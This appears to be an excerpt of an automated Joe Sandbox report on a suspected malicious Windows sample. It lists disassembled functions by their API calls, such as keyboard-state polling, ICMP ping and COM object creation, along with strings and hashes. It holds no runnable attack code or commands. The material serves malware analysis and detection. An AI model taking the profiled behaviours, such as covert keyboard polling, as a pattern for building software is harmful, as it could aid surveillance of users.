                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 429561992-0
                                                                                                                  • Opcode ID: 705105eb71c4584df3613f6c742a60d09e6ae3c6588e7adc43d3f633b22c94f3
                                                                                                                  • Instruction ID: ac77011c3f2eeed6d5403a0057e15cb189144c6ab68bbed6c1ee4442b3c17eb8
                                                                                                                  • Opcode Fuzzy Hash: 705105eb71c4584df3613f6c742a60d09e6ae3c6588e7adc43d3f633b22c94f3
                                                                                                                  • Instruction Fuzzy Hash: BAC159716083059FD700DF68C88496BBBE9FF89B44F20499DF98A9B211DB31EE45CB52
                                                                                                                  Function 00B27A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00B27AF3
                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B27B8F
                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00B27BA3
                                                                                                                  • CoCreateInstance.OLE32(00B4FD08,00000000,00000001,00B76E6C,?), ref: 00B27BEF
                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B27C74
                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00B27CCC
                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00B27D57
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B27D7A
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00B27D81
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00B27DD6
                                                                                                                  • CoUninitialize.OLE32 ref: 00B27DDC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2762341140-0
                                                                                                                  • Opcode ID: a4d42f2bf4862a13e084f651c548c9ef0649d0c633c6c3d12baad1f45ca53351
                                                                                                                  • Instruction ID: 5195935bfa8e6069ba8e2d8f245ebaa43d1edcceb88b64f375279af56d78de56
                                                                                                                  • Opcode Fuzzy Hash: a4d42f2bf4862a13e084f651c548c9ef0649d0c633c6c3d12baad1f45ca53351
                                                                                                                  • Instruction Fuzzy Hash: DAC13D75A04119AFCB14DF64D898DAEBBF9FF48304B1485A9E41ADB361DB30EE41CB90
                                                                                                                  Function 00B4541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B45504
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B45515
                                                                                                                  • CharNextW.USER32(00000158), ref: 00B45544
                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B45585
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B4559B
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B455AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CharNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1350042424-0
                                                                                                                  • Opcode ID: 5e92654dbca236c127f585ed65696e127fdebb933fa4b6bf04d242b87c1d98ff
                                                                                                                  • Instruction ID: 31d6d3acef8d2c8a31d02942e364a0a252376462aa85441176cd546997c0d559
                                                                                                                  • Opcode Fuzzy Hash: 5e92654dbca236c127f585ed65696e127fdebb933fa4b6bf04d242b87c1d98ff
                                                                                                                  • Instruction Fuzzy Hash: 7B619274905A08EBDF209F54CC85AFE7BF9FB06720F108185F9259B292D7709B81EB60
                                                                                                                  Function 00B0FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B0FAAF
                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00B0FB08
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B0FB1A
                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B0FB3A
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00B0FB8D
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B0FBA1
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B0FBB6
                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00B0FBC3
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B0FBCC
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B0FBDE
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B0FBE9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2706829360-0
                                                                                                                  • Opcode ID: 613e4ab62b5d595b9b0337dd5de7a33286237560c7950f813a42511cf6df20e5
                                                                                                                  • Instruction ID: 872b4b8521dc07cb0ea2f25f909f6df8d08fe5d8720372193ce3f6432436ff81
                                                                                                                  • Opcode Fuzzy Hash: 613e4ab62b5d595b9b0337dd5de7a33286237560c7950f813a42511cf6df20e5
                                                                                                                  • Instruction Fuzzy Hash: A8413035A0121A9FCF10DF68D9549BDBFB9FF48754F008469E946A7261CB30AA45CFA0
                                                                                                                  Function 00B19C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B19CA1
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00B19D22
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00B19D3D
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00B19D57
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00B19D6C
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00B19D84
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00B19D96
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00B19DAE
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00B19DC0
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00B19DD8
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00B19DEA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 21c36d1bfab42d723f2d2c8e27524f4bcb845d3dc197949683b157226b9e3786
                                                                                                                  • Instruction ID: 59bd65785663238d63e3f445acd7a6d5b828f294de44ad852d7ed982eaf30cce
                                                                                                                  • Opcode Fuzzy Hash: 21c36d1bfab42d723f2d2c8e27524f4bcb845d3dc197949683b157226b9e3786
                                                                                                                  • Instruction Fuzzy Hash: 5241D8346047C969FF748764D4243F5BEE0FB12744F8880EADAC6575C2DBA49AC8C7A2
                                                                                                                  Function 00B3055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00B305BC
                                                                                                                  • inet_addr.WSOCK32(?), ref: 00B3061C
                                                                                                                  • gethostbyname.WSOCK32(?), ref: 00B30628
                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00B30636
                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B306C6
                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B306E5
                                                                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00B307B9
                                                                                                                  • WSACleanup.WSOCK32 ref: 00B307BF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                  • String ID: Ping
                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                  • Opcode ID: 2a1bb9a1122cb9c76977aad11186d86d341ca72be7972f7ab0183f9ae5ca75e3
                                                                                                                  • Instruction ID: 1b3dd2fa7d30c4b5be0d1fdfa334ad71727ba10a3d4e25c623a9c1ebd17aab30
                                                                                                                  • Opcode Fuzzy Hash: 2a1bb9a1122cb9c76977aad11186d86d341ca72be7972f7ab0183f9ae5ca75e3
                                                                                                                  • Instruction Fuzzy Hash: 85919D34618201DFD320EF15C599F1ABBE4EF44318F2585A9F46A9B6A2CB30ED41CF91
                                                                                                                  Function 00B38CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharLower
                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                  • API String ID: 707087890-567219261
                                                                                                                  • Opcode ID: a0750c2a7a332898473d2d34d77205f4d7d7e555faee8cfa2ef270ed58d2ab5f
                                                                                                                  • Instruction ID: 366850dfc7dc0df230c273aa90de9c645bf8b98efc8632bc72e9337d958859a5
                                                                                                                  • Opcode Fuzzy Hash: a0750c2a7a332898473d2d34d77205f4d7d7e555faee8cfa2ef270ed58d2ab5f
                                                                                                                  • Instruction Fuzzy Hash: 0F517032A042269BCF14DF68C9908BEB7E5FF64720B3142A9F426A7285DB35DD44C791
                                                                                                                  Function 00B3372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32 ref: 00B33774
                                                                                                                  • CoUninitialize.OLE32 ref: 00B3377F
                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00B4FB78,?), ref: 00B337D9
                                                                                                                  • IIDFromString.OLE32(?,?), ref: 00B3384C
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B338E4
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B33936
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                  • API String ID: 636576611-1287834457
                                                                                                                  • Opcode ID: 4ca56e0b4b4d56f5e306a54eeed020249e3ba4045d1a3a8d398f758b841d9b08
                                                                                                                  • Instruction ID: 961d1d44511b20f45b3305c0f822fbdebe46ca2b04464ce4f32a9abaad236a18
                                                                                                                  • Opcode Fuzzy Hash: 4ca56e0b4b4d56f5e306a54eeed020249e3ba4045d1a3a8d398f758b841d9b08
                                                                                                                  • Instruction Fuzzy Hash: 19618074608301AFD310DF54C989F6BBBE8EF45B10F204999F5959B291DB70EE48CB92
                                                                                                                  Function 00B23388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B233CF
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B233F0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString$_wcslen
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 4099089115-3080491070
                                                                                                                  • Opcode ID: 7edcf02a6b77ad1d7a89115a1fbb643d06ab8509e44d1549afd603335d87e600
                                                                                                                  • Instruction ID: ad45ca541107d8c280a7e035237f2c24524d9961b0f561130586b819fa5ef365
                                                                                                                  • Opcode Fuzzy Hash: 7edcf02a6b77ad1d7a89115a1fbb643d06ab8509e44d1549afd603335d87e600
                                                                                                                  • Instruction Fuzzy Hash: 2A518F32800219BADF14EBA0DE56EEEB7FCEF14740F2040A5F10972062DB256F98DB61
                                                                                                                  Function 00B1B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                  • API String ID: 1256254125-769500911
                                                                                                                  • Opcode ID: dc05ec555caf2a413ac10a661a62e946088ee51725931945d5ea10ae8b519819
                                                                                                                  • Instruction ID: 9fa97facd278411505d6b1f5d3cc1a6d4b3a116a09f50fdc601db107e2460897
                                                                                                                  • Opcode Fuzzy Hash: dc05ec555caf2a413ac10a661a62e946088ee51725931945d5ea10ae8b519819
                                                                                                                  • Instruction Fuzzy Hash: F241E732A001269BCB105F7DC9909FEF7E5EB70794B6441A9E425D7284E731CDC1C790
                                                                                                                  Function 00B25393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B253A0
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B25416
                                                                                                                  • GetLastError.KERNEL32 ref: 00B25420
                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00B254A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                  • Opcode ID: fef2b958113aaa3dc31315f4b0bc9cb988cce49a72406d9147240d2760cf798e
                                                                                                                  • Instruction ID: 2f121229769ce868bb8d6d4b7d9cc5a5e9235d83d403fdc24d1643228d2b64d3
                                                                                                                  • Opcode Fuzzy Hash: fef2b958113aaa3dc31315f4b0bc9cb988cce49a72406d9147240d2760cf798e
                                                                                                                  • Instruction Fuzzy Hash: CA31E335A005149FD720EF68D484AEABBF4FF09305F1480A6E529CB396DB71DD86CB90
                                                                                                                  Function 00B43C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateMenu.USER32 ref: 00B43C79
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00B43C88
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B43D10
                                                                                                                  • IsMenu.USER32(?), ref: 00B43D24
                                                                                                                  • CreatePopupMenu.USER32 ref: 00B43D2E
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B43D5B
                                                                                                                  • DrawMenuBar.USER32 ref: 00B43D63
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                  • String ID: 0$F
                                                                                                                  • API String ID: 161812096-3044882817
                                                                                                                  • Opcode ID: 7e0d63a68daa8c4342992f0f68f23c16307f02ae461f4015cd2df8a7e20d8d5b
                                                                                                                  • Instruction ID: e2ecac6efb33da50ca3cd7a67d8c831f75fdad69031271b704919f4bb9f3b3d4
                                                                                                                  • Opcode Fuzzy Hash: 7e0d63a68daa8c4342992f0f68f23c16307f02ae461f4015cd2df8a7e20d8d5b
                                                                                                                  • Instruction Fuzzy Hash: DA416B79A02209AFDB14CF64D884AAE7BF5FF49750F180069F95697360DB30AA10DF90
                                                                                                                  Function 00B11EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B11F64
                                                                                                                  • GetDlgCtrlID.USER32 ref: 00B11F6F
                                                                                                                  • GetParent.USER32 ref: 00B11F8B
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B11F8E
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00B11F97
                                                                                                                  • GetParent.USER32(?), ref: 00B11FAB
                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B11FAE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                  • Opcode ID: 16eb48e633d1ec040db123d81d9f94776fa2d2038a43d3cbd2cce88a3a6b88cc
                                                                                                                  • Instruction ID: 497bb49e0995e8dc7f3a6fba7398aa11d0e77af521d05e0a659db781eac716ad
                                                                                                                  • Opcode Fuzzy Hash: 16eb48e633d1ec040db123d81d9f94776fa2d2038a43d3cbd2cce88a3a6b88cc
                                                                                                                  • Instruction Fuzzy Hash: B521D074900218BFCF00AFA4CC849EEBFB8EF16300F508585BA65632A1DB7549498B60
                                                                                                                  Function 00B43A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B43A9D
                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B43AA0
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B43AC7
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B43AEA
                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B43B62
                                                                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B43BAC
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B43BC7
                                                                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B43BE2
